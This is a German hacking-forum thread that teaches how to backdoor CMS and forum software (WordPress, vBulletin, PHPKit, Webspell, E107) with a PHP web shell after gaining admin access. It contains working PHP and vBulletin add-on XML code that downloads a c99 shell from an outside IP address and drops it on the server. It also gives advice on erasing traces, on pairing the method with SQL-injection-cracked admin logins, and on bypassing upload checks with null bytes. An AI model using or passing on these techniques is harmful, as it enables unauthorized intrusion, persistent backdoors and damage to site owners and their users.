Backdoor CMS/Board via ACP

[-=Player=-]

Author: -=Player=-
Homepage: http://NovuSec.com

Hier möchte ich euch gerne Möglichkeiten vorstellen, wie man unterschiendliche CMS/Boards Backdooren (PHP-Shell uploaden) kann.
Die Möglichkeiten setzen vorraus, dass man sich als Administrator einloggen kann.
[+] Wordpress
Im Admin-Panel wechselt Ihr zu den Menüpunkt “Plugins”. Dort sucht Ihr ein Plugin, dass bereits aktiviert wurde und geht dort auf “Bearbeiten”.
Nun gibt es 2 Möglichkeiten:
1) Ihr schreibt in das Plugin den kompletten Quellcode eurer Shell rein und ruft die Datei wie folgt auf:
http://site.de/wp-content/plugins/pl...ugin-datei.php
Nachteil bei der Variante ist, dass das Plugin anschließen nicht funktioniert und es zu Fehlermeldungen kommen könnte.
2) An oberster Stelle des Plugins schreibt Ihr folgenden Code und speichert das Plugin ab:

<?php
$shell = "http://92.241.165.156/locus-c99.txt";
$code = file_get_contents($shell);
$fp=fopen("Sh3ll.php","w+");
fwrite($fp, $code);
fclose($fp);
?>

Wenn Ihr nun das Plugin über den Browser aufruft:
http://site.de/wp-content/plugins/pl...ugin-datei.php
wird in den Ordner des Plugins automatisch die Datei mit eurer Shell gedropped. Diese könnt Ihr dann wie folgt aufrufen:
http://site.de/wp-content/plugins/plugin-name/Sh3ll.php
Nun dürft Ihr nicht vergessen, den Code Schnippsel aus den Plugin wieder zu entfernen,
da sonst immer wieder versucht wird die Shell zu erstellen und dadurch wieder unnötige Fehlermeldungen entstehen könnten.
[+] vBulletin
Ihr geht im Admin-Panel auf “Add-ons & Plug-ins” > “Add-ons verwalten” > “[Add-on hinzufügen/importieren]“.
Jetzt erstellt Ihr auf Euren PC eine XML-Datei (z.b. shell.xml) und schreibt folgenden Inhalt rein:

<?xml version="1.0" encoding="ISO-8859-1"?>
<product productid="shell" active="1">
<title>vBulletin</title>
<codes>
<code version="2.0">
<installcode><![CDATA[
$shell = "http://92.241.165.156/locus-c99.txt";
$code = file_get_contents($shell);
$fp=fopen("includes/Sh3ll.php","a+");
fwrite($fp, $code);
fclose($fp);]]></installcode>
</code>
</codes>
</product>

Diese Datei Importiert Ihr nun über den entsprechenden Menüpunkt.
Wenn das Add on fertig installiert wurde, findet Ihr eure Shell unter der URL:
http://site.de/includes/Sh3ll.php
Um eure Spuren nun zu verschleiern, könnt Ihr das Addon wieder löschen, unter:
“Add-ons & Plug-ins” > “Add-ons verwalten”
[+] PHPKit
Über das Admin-Panel auf
“Inhalte” > “Inhalt verfassen” > “Download hinzufügen” > {beliebig} > “Download suchen / hinzufügen” > {Shell Uploaden}
Das wars auch.
Nun könnte Ihr die Shell über den Link http://site.de/content/download/shell.php aufrufen

Um euch nun vor solchen “Angriffen” zu schützen, reicht es aus, wenn Ihr das Admin-Panel per htaccess schützt.

Demnächst werden noch mehr möglichkeiten folgen.

[KellerKind]

Webspell: Admin-> Squads-> new squad-> Icon-> shell auswählen->bestätigen->rechtklick "Grafikaddresse kopieren"-> link eingeben zur shell gelnagen

[VeN0m]

Super Arbeit, Player. Hilft sicher vielen ungemein weiter .
Denn die Grundfrage, die man sich mit Adminzugang stellt: "Wie kann ich nun etwas anrichten? / An die FTP-Dateien kommen?". Und das hilft wirklich weiter, wenn man z.B den Adminzugang per SQLi geknackt hat... Vielen Dank.

EDIT: Ich möchte die Liste noch um E107 ergänzen. Wenn man Zugriff auf den Bereich "Voreinstellungen" im ACP hat kann man unter "Voreinstellungen" --> "Textverarbeitung" den BB-Code [php] aktivieren. Am besten für "nur für Admin". Nun muss nurnoch ein Forenpost gemacht werden, in dem durch diesen BB-Code die Shell eingefügt wird. So ein Code könnte z.B. der oben genannte von Player sein.

[kingweed]

Frage:

ich denke mal bei $shell = "http://92.241.165.156/locus-c99.txt";
muss ich die Adresse zu einer funktionierenden Shell.txt eintragen?

[J0hn.X3r]

Logischerweise ja

[kingweed]

Jemand eine Idee, ob und wie es bei Forensoftware: Burning Board® 3.0.8 pl 1, entwickelt von WoltLab® GmbH funktioniert ?

[int_main();]

Jemand eine Idee, ob und wie es bei Forensoftware: Burning Board® 3.0.8 pl 1, entwickelt von WoltLab® GmbH funktioniert ?

Die Plugins werden glaube als gepackte archive hochgeladen? Schau dir mal deren Strucktur an, und versuche in ein package deinen schadcode einzuschleusen.

[kingweed]

Hab nochmal ne Frage.
Ich habe zu einem Board den Supermod-Zugang.
Der Supermod hat ja leider nicht soviele Möglichkeiten etwas zu tun.
Kann er dennoch etwas unternehmen?
Er kann ja bspw. Profilbilder hochladen. Kann anstelle eines Bildes nicht eine Shell oder so hochgeladen werden?

[Sirect]

Er kann ja bspw. Profilbilder hochladen. Kann anstelle eines Bildes nicht eine Shell oder so hochgeladen werden?

Naja, wahrscheinlich werden die Endungen oder der Dateistream überprüft.
Den Stream kannste leicht ändern, bei der Endung kannst du Nullbytes ausprobieren...
Ansonten ginge noch die Kommentarfunktion von JPG's auszunutzen, gibt es ein Video bei Milworm zu.

[kingweed]

in dem VBulletin gibts nur:

Code:

Importieren      
Importieren
vB Optimise     
Manage Settings
Optimal Settings Check
Flush Cache
vBulletin-Einstellungen     
vBulletin-Einstellungen
Suchfunktionstyp
Sicherheitsüberprüfung
Social Bookmarking Netzwerke
Hilfe     
Hilfe verwalten
Hilfethema hinzufügen
Hinweise     
Hinweise verwalten
Neuen Hinweis hinzufügen
Ankündigungen     
Ankündigungen verwalten
Ankündigung hinzufügen
Foren & Moderatoren     
Foren verwalten
Forum hinzufügen
Foren-Rechte
Alle Moderatoren zeigen
Rechte zeigen
Themenpräfixe
Kalender     
Kalender verwalten
Kalender hinzufügen
Kalender-Rechte
Feiertage verwalten
Themenverwaltung     
Löschen
Verschieben
Abonnement löschen
Umfrage löschen
Wer hat abgestimmt
Stichworte
Themenpräfixe     
Themenpräfixe verwalten
Präfix-Kategorie hinzufügen
Moderation     
Themen freischalten
Beiträge freischalten
Anhänge freischalten
Termine freischalten
Profilnachrichten freischalten
Benutzer freischalten
Anhänge     
Anhänge verwalten
Anhangs-Rechte
Suchen
Anhänge freischalten
Anhangs-Statistik
Anhangs-Speicherart
Benutzer     
Benutzer hinzufügen
Benutzer suchen
Benutzer vereinen
Benutzer sperren
Benutzer löschen/verschieben
Private Nachrichten Statistik
Empfehlungen
IP-Adressen durchsuchen
Gesperrte Benutzer zeigen
E-Mail verschicken
E-Mail-Liste erstellen
Individuelle Zugriffsrechte
Benutzergruppen     
Benutzergruppen verwalten
Benutzergruppe hinzufügen
Beitrittsanfragen
Beförderungen
Foren-Rechte
Administrator-Berechtigungen
Interessengemeinschaften löschen
Verwarnsystem     
Regelverstöße verwalten
Regelverstoß hinzufügen
Einschränkung hinzufügen
Automatische Sperre hinzufügen
Verwarnungen zeigen
Profilfelder     
Profilfelder verwalten
Profilfeld hinzufügen
Profilfeld-Kategorien
Benutzerränge     
Benutzerränge verwalten
Benutzerrang hinzufügen
Benutzer-Renommee     
Benutzer-Renommees verwalten
Benutzer-Renommee hinzufügen
Renommee-Kommentare zeigen
Alben     
Bilder-Speicherart
Miniaturansichten neu erstellen
Benutzertitel     
Benutzertitel verwalten
Benutzertitel hinzufügen
Kostenpflichtige Abos     
Abonnements verwalten
Abonnement hinzufügen
Transaktions-Log
Transaktions-Statistik
Abonnement-Rechte
Zahlungssysteme verwalten
Verbindung testen
Benutzerbilder     
Benutzerbilder verwalten
Benutzerbilder hinzufügen
Benutzerbild hochladen
Benutzerbilder-Speicherart
Beitragssymbole     
Beitragssymbole verwalten
Beitragssymbol hinzufügen
Beitragssymbol hochladen
Smileys     
Smileys verwalten
Smiley hinzufügen
Smiley hochladen
Eigene BB-Codes     
BB-Codes verwalten
BB-Code hinzufügen
RSS-Feeds     
RSS-Feeds verwalten
RSS-Feed hinzufügen
Zeitgesteuerte Aufgaben     
Aufgaben verwalten
Aufgabe hinzufügen
Log der Aufgaben
Statistiken & Logs     
Statistiken
Kontrollzentrum-Log
Moderator-Log
Log der Aufgaben
Logs verwalten
Transaktions-Log
Transaktions-Statistik
Wartung     
Datenbanksicherung
Tabellen reparieren/optimieren
Wartungsfunktionen
Diagnose
SQL-Query ausführen
PHP-Info zeigen

und nichts von wegen "“Add-ons & Plug-ins” > “Add-ons verwalten” > “[Add-on hinzufügen/importieren]“."